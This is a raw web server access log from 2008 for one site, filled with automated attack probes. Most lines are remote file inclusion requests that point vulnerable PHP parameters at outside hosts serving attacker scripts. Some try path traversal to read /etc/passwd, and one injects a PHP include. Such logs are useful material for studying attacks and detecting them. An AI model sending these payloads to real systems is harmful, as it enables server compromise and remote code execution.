72.52.214.245 - - [23/Jul/2008:05:52:15 -0700] "GET /logs/config.php?path_to_root=http://ahack.007gb.com/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.sickskins.com"
216.246.77.172 - - [23/Jul/2008:05:52:53 -0700] "GET /logs/access_080705.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://whatswhere.org/img/wiki/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.sickskins.com"
216.246.77.172 - - [23/Jul/2008:05:52:53 -0700] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://whatswhere.org/img/wiki/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.sickskins.com"
216.246.77.172 - - [23/Jul/2008:05:52:53 -0700] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://whatswhere.org/img/wiki/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.sickskins.com"
211.60.155.3 - - [23/Jul/2008:05:53:02 -0700] "GET /logs/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.chilecapacita.cl/nweb_portal/uploads/spypsy/help/dul.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "www.sickskins.com"
211.60.155.3 - - [23/Jul/2008:05:53:03 -0700] "GET /index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.chilecapacita.cl/nweb_portal/uploads/spypsy/help/dul.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "www.sickskins.com"
209.163.169.99 - - [23/Jul/2008:05:53:16 -0700] "GET /scan:/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.proxi-com.ru/mambots/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.sickskins.com"
74.6.8.104 - - [23/Jul/2008:05:53:23 -0700] "GET /logs/access.log HTTP/1.0" 200 51611 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.sickskins.com"
125.243.112.13 - - [23/Jul/2008:05:54:02 -0700] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.ccvcomputer.de/cmd.txt%0D? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.sickskins.com"
125.243.112.13 - - [23/Jul/2008:05:54:03 -0700] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.ccvcomputer.de/cmd.txt%0D? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.sickskins.com"
208.186.78.5 - - [23/Jul/2008:05:55:02 -0700] "GET ///ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.fo-saverne.com/images/temp/readme.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.sickskins.com"
208.186.78.5 - - [23/Jul/2008:05:55:02 -0700] "GET /logs///ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.fo-saverne.com/images/temp/readme.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.sickskins.com"
208.186.78.5 - - [23/Jul/2008:05:55:02 -0700] "GET /logs/access_080629.log///ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.fo-saverne.com/images/temp/readme.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.sickskins.com"
208.186.78.5 - - [23/Jul/2008:05:55:02 -0700] "GET /logs/access_080711.log///ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.fo-saverne.com/images/temp/readme.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.sickskins.com"
65.98.70.18 - - [23/Jul/2008:05:55:37 -0700] "GET /logs/access.log/scan:/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://kingkool2.free.fr/ezupload/ips.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.sickskins.com"
65.98.70.18 - - [23/Jul/2008:05:55:38 -0700] "GET /scan:/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://kingkool2.free.fr/ezupload/ips.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.sickskins.com"
65.98.70.18 - - [23/Jul/2008:05:55:38 -0700] "GET /logs/scan:/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://kingkool2.free.fr/ezupload/ips.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.sickskins.com"
201.116.50.181 - - [23/Jul/2008:05:55:47 -0700] "GET /logs/access.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.tramiche.org/l33tb1t.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.sickskins.com"
201.116.50.181 - - [23/Jul/2008:05:55:47 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.tramiche.org/l33tb1t.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.sickskins.com"
201.116.50.181 - - [23/Jul/2008:05:55:47 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.tramiche.org/l33tb1t.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.sickskins.com"
217.198.149.178 - - [23/Jul/2008:05:56:11 -0700] "GET /logs/access_080705.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.pcshop.gr/backups/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.sickskins.com"
217.198.149.178 - - [23/Jul/2008:05:56:11 -0700] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://www.pcshop.gr/backups/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.sickskins.com"
217.198.149.178 - - [23/Jul/2008:05:56:11 -0700] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.pcshop.gr/backups/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.sickskins.com"
209.172.55.178 - - [23/Jul/2008:05:57:03 -0700] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.sickskins.com"
209.172.55.178 - - [23/Jul/2008:05:57:03 -0700] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.sickskins.com"
209.172.55.178 - - [23/Jul/2008:05:57:03 -0700] "GET /logs/access_080711.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.sickskins.com"
65.98.70.18 - - [23/Jul/2008:05:57:54 -0700] "GET /logs/access_080624.log//templates/mangobery/footer.sample.php?Site_Path=http://kingkool2.free.fr/ezupload/ips.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.sickskins.com"
209.172.55.178 - - [23/Jul/2008:05:58:04 -0700] "GET /logs/access_080629.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.sickskins.com"
72.52.214.245 - - [23/Jul/2008:05:58:45 -0700] "GET /logs/access.log/config.php?path_to_root=http://ahack.007gb.com/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.sickskins.com"
72.52.214.245 - - [23/Jul/2008:05:58:54 -0700] "GET /logs/access.log/config.php?path_to_root=http://ahack.007gb.com/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.sickskins.com"
72.52.214.245 - - [23/Jul/2008:05:58:56 -0700] "GET /logs/access.log/config.php?path_to_root=http://ahack.007gb.com/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.sickskins.com"
72.52.214.245 - - [23/Jul/2008:05:58:57 -0700] "GET /logs/access.log/config.php?path_to_root=http://ahack.007gb.com/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.sickskins.com"
72.52.214.245 - - [23/Jul/2008:05:59:03 -0700] "GET /logs/access.log/config.php?path_to_root=http://ahack.007gb.com/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.sickskins.com"
91.198.175.18 - - [23/Jul/2008:06:00:43 -0700] "GET /logs/access.log/scan:/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://kingkool2.free.fr/ezupload/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.sickskins.com"
91.198.175.18 - - [23/Jul/2008:06:00:44 -0700] "GET /logs/scan:/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://kingkool2.free.fr/ezupload/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.sickskins.com"
69.64.80.225 - - [23/Jul/2008:06:00:48 -0700] "GET //PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://1000mbit.cust.ipeer.se/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sickskins.com"
69.64.80.225 - - [23/Jul/2008:06:00:48 -0700] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://1000mbit.cust.ipeer.se/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sickskins.com"
69.64.80.225 - - [23/Jul/2008:06:00:48 -0700] "GET /logs/access_080703.log//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://1000mbit.cust.ipeer.se/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sickskins.com"
211.194.5.155 - - [23/Jul/2008:06:00:52 -0700] "GET //ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www.tramiche.org/l33tb1t.txt??? HTTP/1.1" 404 275 "-" "Avant Browser (http://www.avantbrowser.com)" "www.sickskins.com"
216.18.5.126 - - [23/Jul/2008:06:01:43 -0700] "GET /logs/access_080629.log/components/com_colorlab/admin.color.php?mosConfig_live_site=http://h1.ripway.com/anakbugis/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sickskins.com"
216.18.5.126 - - [23/Jul/2008:06:01:44 -0700] "GET /components/com_colorlab/admin.color.php?mosConfig_live_site=http://h1.ripway.com/anakbugis/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sickskins.com"
216.18.5.126 - - [23/Jul/2008:06:01:44 -0700] "GET /logs/components/com_colorlab/admin.color.php?mosConfig_live_site=http://h1.ripway.com/anakbugis/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sickskins.com"
216.18.5.126 - - [23/Jul/2008:06:01:44 -0700] "GET /logs/access_080629.log/components/com_colorlab/admin.color.php?mosConfig_live_site=http://classyclassified.com/images/save.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sickskins.com"
216.18.5.126 - - [23/Jul/2008:06:01:44 -0700] "GET /components/com_colorlab/admin.color.php?mosConfig_live_site=http://classyclassified.com/images/save.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sickskins.com"
216.18.5.126 - - [23/Jul/2008:06:01:44 -0700] "GET /logs/components/com_colorlab/admin.color.php?mosConfig_live_site=http://classyclassified.com/images/save.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sickskins.com"
80.93.62.112 - - [23/Jul/2008:06:02:01 -0700] "GET /logs/access_080629.log//modules/TotalCalendar/about.php?inc_dir=http://h1.ripway.com/rastamania/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sickskins.com"
69.64.80.225 - - [23/Jul/2008:06:02:25 -0700] "GET /logs/access_080624.log//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://1000mbit.cust.ipeer.se/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sickskins.com"
209.163.169.99 - - [23/Jul/2008:06:02:25 -0700] "GET /logs/access.log/scan:/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.proxi-com.ru/mambots/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.sickskins.com"
209.163.169.99 - - [23/Jul/2008:06:02:26 -0700] "GET /logs/scan:/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.proxi-com.ru/mambots/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.sickskins.com"
190.196.5.189 - - [23/Jul/2008:06:02:26 -0700] "GET /logs/access.log//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.megaservidores.cl/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sickskins.com"
69.64.80.225 - - [23/Jul/2008:06:03:13 -0700] "GET /logs/access_080703.log%20//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://1000mbit.cust.ipeer.se/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sickskins.com"
69.64.80.225 - - [23/Jul/2008:06:03:17 -0700] "GET /logs/access_080611.log%20//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://1000mbit.cust.ipeer.se/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sickskins.com"
216.246.77.172 - - [23/Jul/2008:06:03:34 -0700] "GET /logs/access_080625.log/components/com_colorlab/admin.color.php?mosConfig_live_site=http://whatswhere.org/img/wiki/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.sickskins.com"
205.234.130.171 - - [23/Jul/2008:06:03:41 -0700] "GET /logs/access_080625.log/components/com_colorlab/admin.color.php?mosConfig_live_site=http://whatswhere.org/img/wiki/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.sickskins.com"
211.194.5.155 - - [23/Jul/2008:06:03:42 -0700] "GET /logs/access.log/?sourcedir=http://www.tramiche.org/l33tb1t.txt??? HTTP/1.1" 404 275 "-" "Avant Browser (http://www.avantbrowser.com)" "www.sickskins.com"
211.194.5.155 - - [23/Jul/2008:06:03:42 -0700] "GET /?sourcedir=http://www.tramiche.org/l33tb1t.txt??? HTTP/1.1" 200 779 "-" "Avant Browser (http://www.avantbrowser.com)" "www.sickskins.com"
211.194.5.155 - - [23/Jul/2008:06:03:42 -0700] "GET /logs/?sourcedir=http://www.tramiche.org/l33tb1t.txt??? HTTP/1.1" 200 1081 "-" "Avant Browser (http://www.avantbrowser.com)" "www.sickskins.com"
88.84.151.157 - - [23/Jul/2008:06:04:07 -0700] "GET /logs/access.log//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.thecornerstone.net/calendar/languages/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sickskins.com"
218.38.54.160 - - [23/Jul/2008:06:05:27 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://naparstki.pl/mediagallery/maint/README? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sickskins.com"
217.198.149.178 - - [23/Jul/2008:06:05:36 -0700] "GET /logs/access_080625.log/components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.pcshop.gr/backups/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.sickskins.com"
217.198.149.178 - - [23/Jul/2008:06:05:37 -0700] "GET /components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.pcshop.gr/backups/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.sickskins.com"
217.198.149.178 - - [23/Jul/2008:06:05:37 -0700] "GET /logs/components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.pcshop.gr/backups/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.sickskins.com"
218.38.54.160 - - [23/Jul/2008:06:05:44 -0700] "GET //index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://naparstki.pl/mediagallery/maint/README? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sickskins.com"
205.234.130.171 - - [23/Jul/2008:06:06:01 -0700] "GET /logs/access.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://whatswhere.org/img/wiki/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.sickskins.com"
216.246.53.83 - - [23/Jul/2008:06:06:15 -0700] "GET /logs/access.log/errors.php?error=http://clubmusic.caucasus.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.sickskins.com"
216.246.53.83 - - [23/Jul/2008:06:06:15 -0700] "GET /errors.php?error=http://clubmusic.caucasus.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.sickskins.com"
216.246.53.83 - - [23/Jul/2008:06:06:15 -0700] "GET /logs/errors.php?error=http://clubmusic.caucasus.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.sickskins.com"
201.116.50.181 - - [23/Jul/2008:06:07:14 -0700] "GET //ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www.tramiche.org/l33tb1t.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.sickskins.com"
201.116.50.181 - - [23/Jul/2008:06:09:02 -0700] "GET /logs//ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www.tramiche.org/l33tb1t.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.sickskins.com"
216.246.53.83 - - [23/Jul/2008:06:09:02 -0700] "GET /logs/access_080611.log/errors.php?error=http://clubmusic.caucasus.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.sickskins.com"
67.15.97.38 - - [23/Jul/2008:06:09:05 -0700] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://rotihidup.com/components/com_rss/ma???? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.sickskins.com"
67.15.97.38 - - [23/Jul/2008:06:09:05 -0700] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://rotihidup.com/components/com_rss/ma???? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.sickskins.com"
201.116.50.181 - - [23/Jul/2008:06:09:15 -0700] "GET /logs/access_080629.log//ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www.tramiche.org/l33tb1t.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.sickskins.com"
216.246.77.172 - - [23/Jul/2008:06:09:43 -0700] "GET /logs/access.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://whatswhere.org/img/wiki/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.sickskins.com"
217.198.149.178 - - [23/Jul/2008:06:09:50 -0700] "GET /logs/access_080620.log/components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.pcshop.gr/backups/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.sickskins.com"
211.194.5.155 - - [23/Jul/2008:06:11:13 -0700] "GET /logs/access_080629.log//ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www.tramiche.org/l33tb1t.txt??? HTTP/1.1" 404 275 "-" "Avant Browser (http://www.avantbrowser.com)" "www.sickskins.com"
211.194.5.155 - - [23/Jul/2008:06:11:13 -0700] "GET /logs//ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www.tramiche.org/l33tb1t.txt??? HTTP/1.1" 404 275 "-" "Avant Browser (http://www.avantbrowser.com)" "www.sickskins.com"
211.194.5.155 - - [23/Jul/2008:06:12:07 -0700] "GET /logs/access_080703.log/?sourcedir=http://www.tramiche.org/l33tb1t.txt??? HTTP/1.1" 404 275 "-" "Avant Browser (http://www.avantbrowser.com)" "www.sickskins.com"
62.212.130.170 - - [23/Jul/2008:06:12:39 -0700] "GET /index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://auxano.info/webcalendar/includes/js/yrec/nfo.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.sickskins.com"
62.212.130.170 - - [23/Jul/2008:06:12:39 -0700] "GET /logs/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://auxano.info/webcalendar/includes/js/yrec/nfo.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.sickskins.com"
74.6.8.104 - - [23/Jul/2008:06:13:23 -0700] "GET /logs/?N=A HTTP/1.0" 200 1065 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.sickskins.com"
208.186.78.5 - - [23/Jul/2008:06:15:33 -0700] "GET ///index.php?DOCUMENT_ROOT=http://www.fo-saverne.com/images/temp/readme.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.sickskins.com"
208.186.78.5 - - [23/Jul/2008:06:15:33 -0700] "GET /logs/access.log///index.php?DOCUMENT_ROOT=http://www.fo-saverne.com/images/temp/readme.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.sickskins.com"
208.186.78.5 - - [23/Jul/2008:06:15:33 -0700] "GET /logs///index.php?DOCUMENT_ROOT=http://www.fo-saverne.com/images/temp/readme.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.sickskins.com"
67.15.97.38 - - [23/Jul/2008:06:15:44 -0700] "GET /principal.php?conteudo=http://rotihidup.com/components/com_rss/ma???? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.sickskins.com"
67.15.97.38 - - [23/Jul/2008:06:15:44 -0700] "GET /logs/principal.php?conteudo=http://rotihidup.com/components/com_rss/ma???? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.sickskins.com"
208.186.78.5 - - [23/Jul/2008:06:16:02 -0700] "GET ///index.php?DOCUMENT_ROOT=http://www.fo-saverne.com/images/temp/readme.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.sickskins.com"
216.246.77.172 - - [23/Jul/2008:06:16:05 -0700] "GET /logs/access_080624.log/phphtml.php?htmlclass_path=http://whatswhere.org/img/wiki/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.sickskins.com"
208.186.78.5 - - [23/Jul/2008:06:16:06 -0700] "GET /logs/access.log///index.php?DOCUMENT_ROOT=http://www.fo-saverne.com/images/temp/readme.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.sickskins.com"
208.186.78.5 - - [23/Jul/2008:06:16:07 -0700] "GET /logs///index.php?DOCUMENT_ROOT=http://www.fo-saverne.com/images/temp/readme.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.sickskins.com"
205.234.130.171 - - [23/Jul/2008:06:16:08 -0700] "GET /logs/access_080624.log/phphtml.php?htmlclass_path=http://whatswhere.org/img/wiki/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.sickskins.com"
74.53.240.146 - - [23/Jul/2008:06:17:15 -0700] "GET /?sourcedir=http://sunshineruby.com/han/Favorites/%B9C%C0%B8/Games/id.txt??? HTTP/1.1" 200 779 "-" "libwww-perl/5.79" "www.sickskins.com"
74.53.240.146 - - [23/Jul/2008:06:17:15 -0700] "GET /logs/?sourcedir=http://sunshineruby.com/han/Favorites/%B9C%C0%B8/Games/id.txt??? HTTP/1.1" 200 1081 "-" "libwww-perl/5.79" "www.sickskins.com"
74.53.240.146 - - [23/Jul/2008:06:17:16 -0700] "GET /logs/access_080711.log/?sourcedir=http://sunshineruby.com/han/Favorites/%B9C%C0%B8/Games/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sickskins.com"
74.53.240.146 - - [23/Jul/2008:06:17:19 -0700] "GET /logs/access_080703.log/?sourcedir=http://sunshineruby.com/han/Favorites/%B9C%C0%B8/Games/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sickskins.com"
74.53.240.146 - - [23/Jul/2008:06:17:23 -0700] "GET /logs/access_080711.log/?sourcedir=http://www.latiatrini.com/tienda/tb/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sickskins.com"
74.53.240.146 - - [23/Jul/2008:06:17:23 -0700] "GET /logs/?sourcedir=http://www.latiatrini.com/tienda/tb/id.txt??? HTTP/1.1" 200 1081 "-" "libwww-perl/5.79" "www.sickskins.com"
74.53.240.146 - - [23/Jul/2008:06:17:23 -0700] "GET /?sourcedir=http://www.latiatrini.com/tienda/tb/id.txt??? HTTP/1.1" 200 779 "-" "libwww-perl/5.79" "www.sickskins.com"
74.53.240.146 - - [23/Jul/2008:06:17:26 -0700] "GET /logs/access_080703.log/?sourcedir=http://www.latiatrini.com/tienda/tb/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sickskins.com"
62.213.79.186 - - [23/Jul/2008:06:17:43 -0700] "GET /errors.php?error=http://clubmusic.caucasus.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sickskins.com"
62.213.79.186 - - [23/Jul/2008:06:17:48 -0700] "GET /logs/errors.php?error=http://clubmusic.caucasus.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sickskins.com"
62.213.79.186 - - [23/Jul/2008:06:17:49 -0700] "GET /logs/access.log/errors.php?error=http://clubmusic.caucasus.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sickskins.com"
85.214.73.149 - - [23/Jul/2008:06:18:21 -0700] "GET /logs/access_080711.log//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://neu_2.lasrv-1.de/web/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.sickskins.com"
85.214.73.149 - - [23/Jul/2008:06:18:21 -0700] "GET //administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://neu_2.lasrv-1.de/web/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.sickskins.com"
85.214.73.149 - - [23/Jul/2008:06:18:22 -0700] "GET /logs//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://neu_2.lasrv-1.de/web/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.sickskins.com"
70.86.234.234 - - [23/Jul/2008:06:18:22 -0700] "GET /logs/access_080629.log//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://lizartdisplay.com/di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.sickskins.com"
70.86.234.234 - - [23/Jul/2008:06:18:23 -0700] "GET //components/com_sitemap/sitemap.php?mosConfig_admin_path=http://lizartdisplay.com/di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.sickskins.com"
85.214.73.149 - - [23/Jul/2008:06:18:23 -0700] "GET /logs/access_080711.log//administrator/components/com_extcalendar/errors.php?error=http://neu_2.lasrv-1.de/web/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.sickskins.com"
85.214.73.149 - - [23/Jul/2008:06:18:24 -0700] "GET //administrator/components/com_extcalendar/errors.php?error=http://neu_2.lasrv-1.de/web/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.sickskins.com"
85.214.73.149 - - [23/Jul/2008:06:18:24 -0700] "GET /logs//administrator/components/com_extcalendar/errors.php?error=http://neu_2.lasrv-1.de/web/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.sickskins.com"
